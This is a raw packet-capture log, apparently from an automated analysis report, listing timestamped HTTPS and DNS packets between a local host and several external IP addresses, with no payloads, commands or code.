                                                                                                                                                                                                                                      Jan 7, 2025 18:53:27.708489895 CET44349811185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:53:27.744124889 CET44349810142.250.185.196192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:53:27.744425058 CET49810443192.168.2.16142.250.185.196
                                                                                                                                                                                                                                      Jan 7, 2025 18:53:27.744436979 CET44349810142.250.185.196192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:53:27.744765997 CET44349810142.250.185.196192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:53:27.745064020 CET49810443192.168.2.16142.250.185.196
                                                                                                                                                                                                                                      Jan 7, 2025 18:53:27.745129108 CET44349810142.250.185.196192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:53:27.791874886 CET49810443192.168.2.16142.250.185.196
                                                                                                                                                                                                                                      Jan 7, 2025 18:53:28.306634903 CET44349811185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:53:28.306958914 CET49811443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:53:28.306976080 CET44349811185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:53:28.307332993 CET44349811185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:53:28.307642937 CET49811443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:53:28.307710886 CET44349811185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:53:28.307785034 CET49811443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:53:28.355334044 CET44349811185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:53:28.550731897 CET44349811185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:53:28.550756931 CET44349811185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:53:28.550832987 CET44349811185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:53:28.550844908 CET49811443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:53:28.550904036 CET49811443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:53:28.551414967 CET49811443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:53:28.551431894 CET44349811185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:53:28.553828001 CET49812443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:53:28.553862095 CET44349812185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:53:28.553951025 CET49812443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:53:28.554222107 CET49812443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:53:28.554235935 CET44349812185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:53:29.155047894 CET44349812185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:53:29.155436993 CET49812443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:53:29.155451059 CET44349812185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:53:29.155817032 CET44349812185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:53:29.156141043 CET49812443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:53:29.156210899 CET44349812185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:53:29.156286955 CET49812443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:53:29.203329086 CET44349812185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:53:29.399808884 CET44349812185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:53:29.399837017 CET44349812185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:53:29.399914026 CET44349812185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:53:29.399929047 CET49812443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:53:29.399995089 CET49812443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:53:29.401012897 CET49812443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:53:29.401022911 CET44349812185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:53:37.655092001 CET44349810142.250.185.196192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:53:37.655157089 CET44349810142.250.185.196192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:53:37.655225992 CET49810443192.168.2.16142.250.185.196
                                                                                                                                                                                                                                      Jan 7, 2025 18:53:38.484431028 CET49810443192.168.2.16142.250.185.196
                                                                                                                                                                                                                                      Jan 7, 2025 18:53:38.484445095 CET44349810142.250.185.196192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:53:52.048351049 CET4981353192.168.2.161.1.1.1
                                                                                                                                                                                                                                      Jan 7, 2025 18:53:52.053189993 CET53498131.1.1.1192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:53:52.053272963 CET4981353192.168.2.161.1.1.1
                                                                                                                                                                                                                                      Jan 7, 2025 18:53:52.053354979 CET4981353192.168.2.161.1.1.1
                                                                                                                                                                                                                                      Jan 7, 2025 18:53:52.053385019 CET4981353192.168.2.161.1.1.1
                                                                                                                                                                                                                                      Jan 7, 2025 18:53:52.058130980 CET53498131.1.1.1192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:53:52.058161974 CET53498131.1.1.1192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:53:52.504386902 CET53498131.1.1.1192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:53:52.504822016 CET4981353192.168.2.161.1.1.1
                                                                                                                                                                                                                                      Jan 7, 2025 18:53:52.509825945 CET53498131.1.1.1192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:53:52.509890079 CET4981353192.168.2.161.1.1.1
                                                                                                                                                                                                                                      Jan 7, 2025 18:53:57.604321957 CET49699443192.168.2.1640.126.31.73
                                                                                                                                                                                                                                      Jan 7, 2025 18:53:57.604321957 CET4970080192.168.2.16192.229.221.95
                                                                                                                                                                                                                                      Jan 7, 2025 18:53:57.609307051 CET4434969940.126.31.73192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:53:57.609399080 CET49699443192.168.2.1640.126.31.73
                                                                                                                                                                                                                                      Jan 7, 2025 18:53:57.609795094 CET8049700192.229.221.95192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:53:57.609849930 CET4970080192.168.2.16192.229.221.95
                                                                                                                                                                                                                                      Jan 7, 2025 18:53:59.475238085 CET49701443192.168.2.1640.126.31.73
                                                                                                                                                                                                                                      Jan 7, 2025 18:53:59.480420113 CET4434970140.126.31.73192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:53:59.480493069 CET49701443192.168.2.1640.126.31.73
                                                                                                                                                                                                                                      Jan 7, 2025 18:53:59.608041048 CET49815443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:53:59.608069897 CET44349815185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:53:59.608166933 CET49815443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:53:59.608568907 CET49815443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:53:59.608582020 CET44349815185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:00.216279030 CET44349815185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:00.216608047 CET49815443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:00.216623068 CET44349815185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:00.217015028 CET44349815185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:00.217325926 CET49815443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:00.217386961 CET44349815185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:00.217483044 CET49815443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:00.259334087 CET44349815185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:00.464092016 CET44349815185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:00.464121103 CET44349815185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:00.464195013 CET44349815185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:00.464286089 CET49815443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:00.464286089 CET49815443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:00.464965105 CET49815443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:00.464977980 CET44349815185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:00.467570066 CET49816443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:00.467597961 CET44349816185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:00.467674017 CET49816443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:00.467906952 CET49816443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:00.467916965 CET44349816185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:00.835144043 CET49702443192.168.2.1640.126.31.73
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:00.840765953 CET4434970240.126.31.73192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:00.840838909 CET49702443192.168.2.1640.126.31.73
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:01.155435085 CET44349816185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:01.155757904 CET49816443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:01.155781984 CET44349816185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:01.156126976 CET44349816185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:01.156450987 CET49816443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:01.156513929 CET44349816185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:01.156611919 CET49816443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:01.203331947 CET44349816185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:01.399930000 CET44349816185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:01.399950981 CET44349816185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:01.400008917 CET44349816185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:01.400022030 CET49816443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:01.400094032 CET49816443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:01.401174068 CET49816443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:01.401190042 CET44349816185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:10.475528002 CET49817443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:10.475562096 CET44349817185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:10.475651026 CET49817443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:10.475889921 CET49817443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:10.475905895 CET44349817185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:11.208646059 CET44349817185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:11.208986044 CET49817443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:11.209002018 CET44349817185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:11.209305048 CET44349817185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:11.209599972 CET49817443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:11.209657907 CET44349817185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:11.209744930 CET49817443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:11.255332947 CET44349817185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:11.473077059 CET44349817185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:11.473098993 CET44349817185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:11.473113060 CET44349817185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:11.473181963 CET49817443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:11.473202944 CET44349817185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:11.524039030 CET49817443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:11.549508095 CET44349817185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:11.549526930 CET44349817185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:11.549597025 CET49817443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:11.549607992 CET44349817185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:11.549654007 CET49817443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:11.552159071 CET44349817185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:11.552218914 CET49817443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:11.577862978 CET44349817185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:11.577877045 CET44349817185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:11.577939987 CET49817443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:11.577955008 CET44349817185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:11.578003883 CET49817443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:11.639873981 CET44349817185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:11.639889002 CET44349817185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:11.639965057 CET49817443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:11.639981985 CET44349817185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:11.640033007 CET49817443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:11.642755985 CET44349817185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:11.642770052 CET44349817185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:11.642832994 CET49817443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:11.642841101 CET44349817185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:11.642882109 CET49817443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:11.658727884 CET44349817185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:11.658745050 CET44349817185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:11.658813953 CET49817443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:11.658823013 CET44349817185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:11.658865929 CET49817443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:11.718072891 CET44349817185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:11.718094110 CET44349817185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:11.718190908 CET49817443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:11.718236923 CET44349817185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:11.718290091 CET49817443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:11.729640007 CET44349817185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:11.729655981 CET44349817185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:11.729723930 CET49817443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:11.729734898 CET44349817185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:11.729784966 CET49817443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:11.731338978 CET44349817185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:11.731353998 CET44349817185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:11.731379032 CET44349817185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:11.731410027 CET49817443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:11.731417894 CET44349817185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:11.731448889 CET49817443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:11.731460094 CET44349817185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:11.731513977 CET49817443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:11.731590033 CET49817443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:11.731606960 CET44349817185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:11.734539032 CET49818443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:11.734571934 CET44349818185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:11.734661102 CET49818443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:11.734915972 CET49818443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:11.734926939 CET44349818185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:12.447657108 CET44349818185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:12.447971106 CET49818443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:12.447987080 CET44349818185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:12.448298931 CET44349818185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:12.448961973 CET49818443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:12.449027061 CET44349818185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:12.449171066 CET49818443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:12.495320082 CET44349818185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:12.715169907 CET44349818185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:12.715202093 CET44349818185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:12.715224028 CET44349818185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:12.715289116 CET49818443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:12.715317965 CET44349818185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:12.766146898 CET49818443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:12.790313005 CET44349818185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:12.790322065 CET44349818185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:12.790355921 CET44349818185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:12.790385008 CET49818443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:12.790394068 CET44349818185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:12.790421009 CET49818443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:12.790441036 CET49818443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:12.794593096 CET44349818185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:12.794656038 CET49818443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:12.850234985 CET44349818185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:12.850254059 CET44349818185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:12.850331068 CET49818443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:12.850346088 CET44349818185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:12.850397110 CET49818443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:12.880321026 CET44349818185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:12.880337954 CET44349818185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:12.880393982 CET49818443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:12.880410910 CET44349818185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:12.880462885 CET49818443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:12.882148981 CET44349818185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:12.882162094 CET44349818185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:12.882220984 CET49818443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:12.882227898 CET44349818185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:12.882273912 CET49818443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:12.896034002 CET44349818185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:12.896049976 CET44349818185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:12.896110058 CET49818443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:12.896116018 CET44349818185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:12.896164894 CET49818443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:12.970015049 CET44349818185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:12.970031023 CET44349818185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:12.970101118 CET49818443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:12.970123053 CET44349818185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:12.970175982 CET49818443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:12.970854044 CET44349818185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:12.970868111 CET44349818185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:12.970928907 CET49818443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:12.970935106 CET44349818185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:12.970982075 CET49818443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:12.971999884 CET44349818185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:12.972014904 CET44349818185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:12.972065926 CET44349818185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:12.972073078 CET49818443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:12.972076893 CET44349818185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:12.972106934 CET49818443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:12.972150087 CET44349818185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:12.972202063 CET49818443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:12.972285032 CET49818443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:12.972299099 CET44349818185.15.59.224192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:12.972306013 CET49818443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:12.972352028 CET49818443192.168.2.16185.15.59.224
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:27.150722027 CET49819443192.168.2.16142.250.185.196
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:27.150758028 CET44349819142.250.185.196192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:27.150832891 CET49819443192.168.2.16142.250.185.196
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:27.151122093 CET49819443192.168.2.16142.250.185.196
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:27.151134968 CET44349819142.250.185.196192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:27.921598911 CET44349819142.250.185.196192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:27.922039032 CET49819443192.168.2.16142.250.185.196
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:27.922055960 CET44349819142.250.185.196192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:27.922420025 CET44349819142.250.185.196192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:27.922825098 CET49819443192.168.2.16142.250.185.196
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:27.922892094 CET44349819142.250.185.196192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:54:27.962169886 CET49819443192.168.2.16142.250.185.196
                                                                                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:22.283102989 CET53618571.1.1.1192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:22.284990072 CET53609081.1.1.1192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:22.478548050 CET6502953192.168.2.161.1.1.1
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:22.478894949 CET6422853192.168.2.161.1.1.1
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:22.485621929 CET53642281.1.1.1192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:23.119514942 CET4962553192.168.2.161.1.1.1
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:23.119745016 CET6461653192.168.2.161.1.1.1
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:23.120508909 CET5155753192.168.2.161.1.1.1
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:23.120691061 CET5822053192.168.2.161.1.1.1
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:23.127264977 CET53582201.1.1.1192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:23.131350994 CET53646161.1.1.1192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:23.131611109 CET53496251.1.1.1192.168.2.16
                                                                                                                                                                                                                                      Jan 7, 2025 18:52:23.365855932 CET53641501.1.1.1192.168.2.16
